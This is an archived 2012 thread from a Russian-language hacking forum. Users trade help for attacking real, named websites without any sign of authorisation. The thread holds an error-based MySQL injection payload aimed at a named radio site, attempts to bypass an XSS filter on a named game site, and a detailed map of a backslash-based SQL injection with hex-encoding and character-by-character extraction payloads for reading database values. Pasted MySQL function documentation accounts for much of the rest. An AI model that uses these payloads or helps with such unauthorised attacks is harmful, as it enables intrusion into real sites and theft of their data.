ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.11.2012, 02:20
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852
Репутация:
0
|
|
Товарищи, есть идеи по поводу http://ironage-radio.com/' , можно как-то это использовать?
|
|
|
13.11.2012, 03:09
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от cipa21
cipa21 said:
Товарищи, есть идеи по поводу http://ironage-radio.com/' , можно как-то это использовать?
http://ironage-radio.com/'and(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and(1)='1+--+
extractvalue тоже катит, пробуй сам
|
|
|
|
13.11.2012, 22:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
7650
Репутация:
0
|
|
Всем привет. Нашел xss но вот
фильтр съедает всё что в скобках <> сначала думал съедает скрипт
проверил съедает всё что внутри <> как обойти фильтрацию, помогите
пожалуйста
|
|
|
|
14.11.2012, 07:49
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Kolyan333
Kolyan333 said:
Всем привет. Нашел xss но вот
фильтр съедает всё что в скобках <> сначала думал съедает скрипт
проверил съедает всё что внутри <> как обойти фильтрацию, помогите
пожалуйста
Надо смотреть на месте. Двойные
|
|
|
|
14.11.2012, 09:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
7650
Репутация:
0
|
|
нет двойные тоже не пропускают. Когда впереди пишу >>> то пропускает но скрипт не выполняется. Как понял фильтр находит открытие и закрытые скобок и удаляет .
|
|
|
|
14.11.2012, 09:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
7650
Репутация:
0
|
|
когда пишу так >> ript>alert("")ript> то вижу это после фильтрации alert("") но сам скрипт не выполняется
|
|
|
|
14.11.2012, 09:42
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Kolyan333
Kolyan333 said:
когда пишу так >> ript>alert("")ript> то вижу это после фильтрации alert("") но сам скрипт не выполняется
Нужен сам скрипт для тестирования. Вариантов куча может быть.
|
|
|
|
14.11.2012, 13:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
7650
Репутация:
0
|
|
вот сайт galaxy.mobstudio.ru/web в любой поле вводишь кроме смс в эфир то съедает всё что внутри скобок. проверь пожалуйста |
|
|
|
14.11.2012, 16:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
2564
Репутация:
0
|
|
прошу помощи для совершения sql-инъекции
Всем доброго времени суток.
Прошу помощи извлечь полезную информацию из базы данных, используя sql-инъекцию.
Недавно на некотором сайте обнаружил возможность sql-инъекции:
в передаваемом post-параметре НЕ фильтруется обратный слэш ( \ ; ascii-код = 92 = 0x5C ).
Если заполнить текстовый input с именем ID значением 12345 , а другой текстовый input с именем VarXXX значением 67890\ и за-SUBMIT-ить форму - то сайт вернет следущую ошибку:
Ошибка сервера Базы Данных MySQL!
Ошибка:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''67890\' AND `id`=12345' at line 1
Номер ошибки:
1064
и далее подробности ошибки (ошибочный sql-запрос):
SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='67890\' AND `id`=12345
"Одинарная" кавычка ( ' = апостроф ; ascii-код = 39 = 0x27 ) и "двойная" кавычка ( " ; ascii-код = 34 = 0x22 ) , а также + (знак плюса) фильтруются (вырезаются) ,вероятно, на уровне php.
Если , например, заполнить текстовый input с именем ID значением 5'4321 , а другой текстовый input с именем VarXXX значением 0'9876\ - то сайт вернет ошибку со следущими подробностями:
SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=54321
Если , например, заполнить текстовый input с именем ID значением 5"4321 , а другой текстовый input с именем VarXXX значением 0"9876\ - то сайт вернет ошибку с теми же самыми подробностями:
SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=54321
Символы !#$%&()*,-./:;?@[\]^_`{|}~ , а также пробел не фильтруются
Если , например, заполнить текстовый input с именем ID значением 777 , а другой текстовый input с именем VarXXX значением 11!#$%&()*,-./:;?@[\]^_`{|}~ 22 - то сайт вернет ошибку со следущими подробностями:
SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='11!#$%&()*,-./:;?@[\]^_`{|}~ 22\' AND `id`=777
Подобным образом выяснилось, что значения из текстового input-а с именем ID приводятся только к числовому виду таким образом, что первый в строке любой нецифровой символ (или буква) , а также всё, что идёт после него (или неё), - вырезается.
Если , например, заполнить текстовый input с именем ID значением 123d456 , а другой текстовый input с именем VarXXX значением 09876\ - то сайт вернет ошибку со следущими подробностями:
SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=123
Если же , например, заполнить текстовый input с именем ID значением 0xff , а другой текстовый input с именем VarXXX значением 09876\ - то сайт вернет ошибку со следущими подробностями:
SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=0
Что можно полезного поиметь в этом случае ?
P.S.
названия INPUT-ов , а также названия столбцов и таблицы в БД умышленно мною изменены
|
|
|
|
14.11.2012, 17:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
2564
Репутация:
0
|
|
Сообщение от IMMORTAL_S
IMMORTAL_S said:
Конечно можно blind'ануть, но придумал такой вариант:
Код:
Code:
'+(select(Replace(Replace(Replace(Replace(Replace(Replace(hex(user()),'F','006'),'E','005'),'D','004'),'C','003'),'B','002'),'A','001')))+'
Если текст небольшой,
результат -
00419100400021004182
иначе -
4.19100400021004e+17
По сравнению с blind'ом, вариант лучше, но и здесь есть минусы, т.к. при обратной конвертации
4.19100400021004e+17
дает 00
419100400021004
000а что мешает тебе извлекать любую необходимую тебе строку по одному символу ?
ord(mid(user(),1,1)) - ascii-код первого символа пльзователя
ord(mid(user(),2,1)) - ascii-код второго символа пльзователя
ord(mid(user(),3,1)) - ascii-код третьего символа пльзователя
и .т.д.
P.S. учи "мат. часть"
функция MID() = SUBSTRING()
Return a substring starting from the specified position
MID(str,pos,len) is a synonym for SUBSTRING(str,pos,len).
SUBSTRING(str,pos), SUBSTRING(str FROM pos), SUBSTRING(str,pos,len), SUBSTRING(str FROM pos FOR len)
The forms without a len argument return a substring from string str starting at position pos. The forms with a len argument return a substring len characters long from string str, starting at position pos. The forms that use FROM are standard SQL syntax. It is also possible to use a negative value for pos. In this case, the beginning of the substring is pos characters from the end of the string, rather than the beginning. A negative value may be used for pos in any of the forms of this function.
For all forms of SUBSTRING(), the position of the first character in the string from which the substring is to be extracted is reckoned as 1.
mysql> SELECT SUBSTRING('Quadratically',5);
-> 'ratically'
mysql> SELECT SUBSTRING('foobarbar' FROM 4);
-> 'barbar'
mysql> SELECT SUBSTRING('Quadratically',5,6);
-> 'ratica'
mysql> SELECT SUBSTRING('Sakila', -3);
-> 'ila'
mysql> SELECT SUBSTRING('Sakila', -5, 3);
-> 'aki'
mysql> SELECT SUBSTRING('Sakila' FROM -4 FOR 2);
-> 'ki'
This function is multi-byte safe.
If len is less than 1, the result is the empty string.
функция ORD() = ASCII() Return character code for leftmost character of the argument
If the leftmost character of the string str is a multi-byte character, returns the code for that character, calculated from the numeric values of its constituent bytes using this formula:
(1st byte code)
+ (2nd byte code * 256)
+ (3rd byte code * 2562) ...
If the leftmost character is not a multi-byte character, ORD() returns the same value as the ASCII() function.
mysql> SELECT ORD('2');
-> 50
ASCII(str) - аналог полный аналог функции ord() , но для строк , состоящих из 8-битных символов
Returns the numeric value of the leftmost character of the string str. Returns 0 if str is the empty string. Returns NULL if str is NULL. ASCII() works for 8-bit characters.
mysql> SELECT ASCII('2');
-> 50
mysql> SELECT ASCII(2);
-> 50
mysql> SELECT ASCII('dx');
-> 100
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
